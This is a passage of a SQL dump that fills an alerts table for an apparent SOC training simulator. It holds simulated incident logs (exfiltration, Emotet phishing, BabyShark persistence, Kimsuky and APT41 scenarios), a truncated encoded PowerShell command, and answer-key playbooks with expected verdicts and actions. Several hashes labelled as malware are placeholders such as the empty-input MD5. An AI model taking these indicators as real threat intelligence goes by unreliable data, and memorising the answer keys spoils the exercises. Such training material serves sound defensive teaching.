4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:45Z\\\",\\\"event_id\\\":\\\"dlp-collection-56789\\\",\\\"source_ip\\\":\\\"10.1.1.5\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"username\\\":\\\"jdoe\\\",\\\"accessed_files\\\":[\\\"/research/patient_data/sensitive_data.xlsx\\\",\\\"/research/materials_science/proprietary_formula.docx\\\"],\\\"file_hashes\\\":[\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"5eb63bbbe01eeed093cb22bb8f5acdc3\\\"],\\\"malware_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"alert_reason\\\":\\\"Multiple sensitive files accessed and malware hash detected.\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(402, 'Data Exfiltration Attempt Blocked', 'high', 'Firewall Logs', 'A detected attempt to transfer data to an external server was blocked. This represents the final stage of a sophisticated attack, indicating a potential breach.', 'Exfiltration', 'T1048: Exfiltration Over Alternative Protocol', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T15:47:23Z\",\"firewall_id\":\"FW-12345\",\"action\":\"blocked\",\"source_ip\":\"10.0.15.23\",\"destination_ip\":\"203.0.113.45\",\"destination_port\":443,\"protocol\":\"HTTPS\",\"username\":\"jdoe\",\"filename\":\"confidential_data.zip\",\"file_hash\":\"9e107d9d372bb6826bd81d3542a419d6\",\"policy_rule\":\"Block_Exfiltration_Attempts\",\"detection_method\":\"anomaly_detection\",\"alert_id\":\"alert-98765\",\"additional_info\":{\"attempted_bytes_transferred\":2048000,\"malware_family\":\"APT29\"}}', '2026-01-04 02:15:53', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"Known command and control server associated with APT29.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.15.23\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal host attempting unauthorized data transfer.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"9e107d9d372bb6826bd81d3542a419d6\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with malicious exfiltration tool.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"confidential_data.zip\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Database\",\"verdict\":\"suspicious\",\"details\":\"Sensitive file format detected in unauthorized transfer attempt.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Active Directory\",\"verdict\":\"internal\",\"details\":\"User account involved in data exfiltration attempt.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'DLP', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0);
INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`, `created_by`, `organization_id`, `simulation_data`, `is_archived`) VALUES
(403, 'Suspicious Email Attachment Detected', 'medium', 'Email Gateway Logs', 'A spear-phishing email was detected targeting key personnel at the think tank. The email contained a document with malicious macros aiming to gain initial access to the network.', 'Initial Access', 'T1566.001', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:32:00Z\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.5\",\"email_subject\":\"Urgent: Update Required\",\"sender_email\":\"attackers@maliciousdomain.com\",\"recipient_email\":\"john.doe@thinktank.org\",\"attachment_name\":\"UpdateInstructions.docm\",\"attachment_hash\":\"5f4dcc3b5aa765d61d8327deb882cf99\",\"malware_family\":\"Emotet\",\"user\":\"jdoe\"}', '2026-01-04 02:18:47', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP associated with Emotet campaigns.\"}},{\"id\":\"artifact_2\",\"type\":\"email\",\"value\":\"attackers@maliciousdomain.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"Email Threat Intelligence\",\"verdict\":\"malicious\",\"details\":\"Email domain associated with phishing campaigns.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"UpdateInstructions.docm\",\"is_critical\":false,\"osint_result\":{\"source\":\"File Reputation Service\",\"verdict\":\"suspicious\",\"details\":\"File contains macros linked to Emotet malware.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"5f4dcc3b5aa765d61d8327deb882cf99\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash matches known Emotet payload.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Beginner', 'NDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Suspicious Email Attachment Detected\",\"date\":\"2026-02-01T20:32:19.007Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(404, 'Malicious Browser Extension Installed', 'high', 'Endpoint Detection and Response (EDR)', 'Upon opening the attachment, a script executes silently in the background, installing a malicious browser extension designed to intercept email credentials.', 'Execution', 'T1059', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:32:45Z\",\"event_id\":\"4624\",\"computer_name\":\"user-pc.example.com\",\"user\":\"jdoe\",\"source_ip\":\"192.168.1.15\",\"attacker_ip\":\"203.0.113.5\",\"malicious_file\":\"browser_harvest_ext.crx\",\"file_hash\":\"d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2\",\"script_name\":\"install_extension.js\",\"process_id\":4321,\"action\":\"extension_installed\",\"extension_id\":\"abcdef123456\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36\"}', '2026-01-04 02:18:47', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.5\",\"is_critical\":true,\"osint_result\":{\"source\":\"ThreatIntelDB\",\"verdict\":\"malicious\",\"details\":\"IP associated with credential harvesting campaigns.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2\",\"is_critical\":true,\"osint_result\":{\"source\":\"MalwareHashDB\",\"verdict\":\"malicious\",\"details\":\"Hash corresponds to known malicious browser extensions.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"browser_harvest_ext.crx\",\"is_critical\":false,\"osint_result\":{\"source\":\"InternalEDR\",\"verdict\":\"suspicious\",\"details\":\"Detected as part of an unauthorized installation process.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'EDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(405, 'BabyShark VBS Script Execution', 'medium', 'System Event Logs', 'The BabyShark VBS script was executed to establish persistence on the compromised system. This script runs at startup, allowing attackers to maintain access over time.', 'Persistence', 'T1547.001', 1, 'new', NULL, '{\"event_id\":\"7045\",\"timestamp\":\"2023-10-12T14:22:35Z\",\"computer_name\":\"compromised-host.local\",\"user\":\"SYSTEM\",\"action\":\"Service Installed\",\"service_name\":\"BabySharkVBS\",\"service_filename\":\"C:\\\\Windows\\\\System32\\\\BabyShark.vbs\",\"command_line\":\"wscript.exe C:\\\\Windows\\\\System32\\\\BabyShark.vbs\",\"source_ip\":\"203.0.113.45\",\"internal_ip\":\"192.168.1.15\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"associated_user\":\"compromised_user\"}', '2026-01-04 02:18:47', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Public IP Blacklist\",\"verdict\":\"malicious\",\"details\":\"IP associated with known malicious activity.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hash Lookup\",\"verdict\":\"malicious\",\"details\":\"Hash matches known BabyShark VBS script.\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"compromised_user\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal User Database\",\"verdict\":\"internal\",\"details\":\"User account compromised as part of the attack.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'Beginner', 'SIEM', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:19.009Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"event_id\\\":\\\"7045\\\",\\\"timestamp\\\":\\\"2023-10-12T14:22:35Z\\\",\\\"computer_name\\\":\\\"compromised-host.local\\\",\\\"user\\\":\\\"SYSTEM\\\",\\\"action\\\":\\\"Service Installed\\\",\\\"service_name\\\":\\\"BabySharkVBS\\\",\\\"service_filename\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\BabyShark.vbs\\\",\\\"command_line\\\":\\\"wscript.exe C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\BabyShark.vbs\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.15\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"associated_user\\\":\\\"compromised_user\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:19.009Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"event_id\\\":\\\"7045\\\",\\\"timestamp\\\":\\\"2023-10-12T14:22:35Z\\\",\\\"computer_name\\\":\\\"compromised-host.local\\\",\\\"user\\\":\\\"SYSTEM\\\",\\\"action\\\":\\\"Service Installed\\\",\\\"service_name\\\":\\\"BabySharkVBS\\\",\\\"service_filename\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\BabyShark.vbs\\\",\\\"command_line\\\":\\\"wscript.exe C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\BabyShark.vbs\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.15\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"associated_user\\\":\\\"compromised_user\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:19.009Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"event_id\\\":\\\"7045\\\",\\\"timestamp\\\":\\\"2023-10-12T14:22:35Z\\\",\\\"computer_name\\\":\\\"compromised-host.local\\\",\\\"user\\\":\\\"SYSTEM\\\",\\\"action\\\":\\\"Service Installed\\\",\\\"service_name\\\":\\\"BabySharkVBS\\\",\\\"service_filename\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\BabyShark.vbs\\\",\\\"command_line\\\":\\\"wscript.exe C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\BabyShark.vbs\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.15\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"associated_user\\\":\\\"compromised_user\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:19.009Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"event_id\\\":\\\"7045\\\",\\\"timestamp\\\":\\\"2023-10-12T14:22:35Z\\\",\\\"computer_name\\\":\\\"compromised-host.local\\\",\\\"user\\\":\\\"SYSTEM\\\",\\\"action\\\":\\\"Service Installed\\\",\\\"service_name\\\":\\\"BabySharkVBS\\\",\\\"service_filename\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\BabyShark.vbs\\\",\\\"command_line\\\":\\\"wscript.exe C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\BabyShark.vbs\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.15\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"associated_user\\\":\\\"compromised_user\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:19.009Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"event_id\\\":\\\"7045\\\",\\\"timestamp\\\":\\\"2023-10-12T14:22:35Z\\\",\\\"computer_name\\\":\\\"compromised-host.local\\\",\\\"user\\\":\\\"SYSTEM\\\",\\\"action\\\":\\\"Service Installed\\\",\\\"service_name\\\":\\\"BabySharkVBS\\\",\\\"service_filename\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\BabyShark.vbs\\\",\\\"command_line\\\":\\\"wscript.exe C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\BabyShark.vbs\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.15\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"associated_user\\\":\\\"compromised_user\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(406, 'Unauthorized Access to Internal Network', 'high', 'Network Traffic Analysis', 'An attacker was detected moving laterally within the internal network by exploiting compromised credentials. The attacker was observed accessing multiple internal systems, suggesting an attempt to identify sensitive data and further vulnerabilities.', 'Lateral Movement', 'T1078: Valid Accounts', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:22:35Z\",\"src_ip\":\"203.0.113.45\",\"dst_ip\":\"10.0.0.5\",\"user\":\"jdoe\",\"action\":\"login_success\",\"protocol\":\"SMB\",\"file_accessed\":\"sensitive_data.xlsx\",\"hash\":\"3d2e4f8c5b9a4f4d9a7b0c9f1e2b3c4d\",\"event_id\":\"4624\",\"message\":\"User jdoe successfully logged in from 203.0.113.45 to 10.0.0.5 via SMB.\"}', '2026-01-04 02:18:47', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"ThreatIntelligenceDatabase\",\"verdict\":\"malicious\",\"details\":\"IP associated with known APT group activities.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.5\",\"is_critical\":false,\"osint_result\":{\"source\":\"InternalNetwork\",\"verdict\":\"internal\",\"details\":\"Internal IP address.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"InternalUserDatabase\",\"verdict\":\"internal\",\"details\":\"Compromised internal user account.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"3d2e4f8c5b9a4f4d9a7b0c9f1e2b3c4d\",\"is_critical\":true,\"osint_result\":{\"source\":\"MalwareDatabase\",\"verdict\":\"malicious\",\"details\":\"Hash corresponds to known malware used for lateral movement.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'beginner', 'NDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(407, 'Data Exfiltration Detected', 'high', 'Data Loss Prevention (DLP) Systems', 'The Kimsuky APT group has successfully exfiltrated sensitive emails and documents related to nuclear policy. They utilized a compromised browser extension to send data back to their command and control servers.', 'Exfiltration', 'T1020 - Automated Exfiltration', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:52:23Z\",\"event_id\":\"EXFIL-2023-1001\",\"source_ip\":\"10.0.0.15\",\"destination_ip\":\"203.0.113.45\",\"user\":\"johndoe\",\"exfiltrated_files\":[\"nuclear_policy_draft.docx\",\"email_correspondence_2023.eml\"],\"malware_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"malicious_extension_id\":\"kimsuky_extension_123\",\"c2_server\":\"malicious.kimsuky.org\"}', '2026-01-04 02:18:47', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"ThreatIntelDB\",\"verdict\":\"malicious\",\"details\":\"Known Kimsuky C2 server\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Associated with Kimsuky malware\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"nuclear_policy_draft.docx\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"Sensitive document\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"johndoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"Affected user\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:19.012Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:52:23Z\\\",\\\"event_id\\\":\\\"EXFIL-2023-1001\\\",\\\"source_ip\\\":\\\"10.0.0.15\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"user\\\":\\\"johndoe\\\",\\\"exfiltrated_files\\\":[\\\"nuclear_policy_draft.docx\\\",\\\"email_correspondence_2023.eml\\\"],\\\"malware_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"malicious_extension_id\\\":\\\"kimsuky_extension_123\\\",\\\"c2_server\\\":\\\"malicious.kimsuky.org\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:19.012Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:52:23Z\\\",\\\"event_id\\\":\\\"EXFIL-2023-1001\\\",\\\"source_ip\\\":\\\"10.0.0.15\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"user\\\":\\\"johndoe\\\",\\\"exfiltrated_files\\\":[\\\"nuclear_policy_draft.docx\\\",\\\"email_correspondence_2023.eml\\\"],\\\"malware_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"malicious_extension_id\\\":\\\"kimsuky_extension_123\\\",\\\"c2_server\\\":\\\"malicious.kimsuky.org\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:19.012Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:52:23Z\\\",\\\"event_id\\\":\\\"EXFIL-2023-1001\\\",\\\"source_ip\\\":\\\"10.0.0.15\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"user\\\":\\\"johndoe\\\",\\\"exfiltrated_files\\\":[\\\"nuclear_policy_draft.docx\\\",\\\"email_correspondence_2023.eml\\\"],\\\"malware_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"malicious_extension_id\\\":\\\"kimsuky_extension_123\\\",\\\"c2_server\\\":\\\"malicious.kimsuky.org\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:19.012Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:52:23Z\\\",\\\"event_id\\\":\\\"EXFIL-2023-1001\\\",\\\"source_ip\\\":\\\"10.0.0.15\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"user\\\":\\\"johndoe\\\",\\\"exfiltrated_files\\\":[\\\"nuclear_policy_draft.docx\\\",\\\"email_correspondence_2023.eml\\\"],\\\"malware_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"malicious_extension_id\\\":\\\"kimsuky_extension_123\\\",\\\"c2_server\\\":\\\"malicious.kimsuky.org\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:19.012Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:52:23Z\\\",\\\"event_id\\\":\\\"EXFIL-2023-1001\\\",\\\"source_ip\\\":\\\"10.0.0.15\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"user\\\":\\\"johndoe\\\",\\\"exfiltrated_files\\\":[\\\"nuclear_policy_draft.docx\\\",\\\"email_correspondence_2023.eml\\\"],\\\"malware_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"malicious_extension_id\\\":\\\"kimsuky_extension_123\\\",\\\"c2_server\\\":\\\"malicious.kimsuky.org\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(408, 'Initial Access via Supply Chain Compromise', 'high', 'Network Intrusion Detection System', 'APT41 has initiated an operation by exploiting a vulnerability in a third-party software update, gaining initial access to the targeted gaming company\'s network.', 'Supply Chain Attack', 'T1195.002 - Software Supply Chain', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T08:45:32Z\",\"event_id\":\"EVT-2023-20145\",\"source_ip\":\"198.51.100.14\",\"destination_ip\":\"10.0.5.25\",\"filename\":\"CCleaner_Update_v5.7.exe\",\"hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"alert_name\":\"Suspicious Software Update\",\"user\":\"update_service\",\"description\":\"Detected a potentially malicious software update from a third-party provider.\"}', '2026-01-04 02:21:52', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.14\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Known IP associated with previous APT41 campaigns.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.5.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP of the compromised host.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"CCleaner_Update_v5.7.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"File Reputation Service\",\"verdict\":\"malicious\",\"details\":\"File associated with supply chain attacks targeting software updates.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Analysis\",\"verdict\":\"malicious\",\"details\":\"Hash matches known malware variant used by APT41.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'TI', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
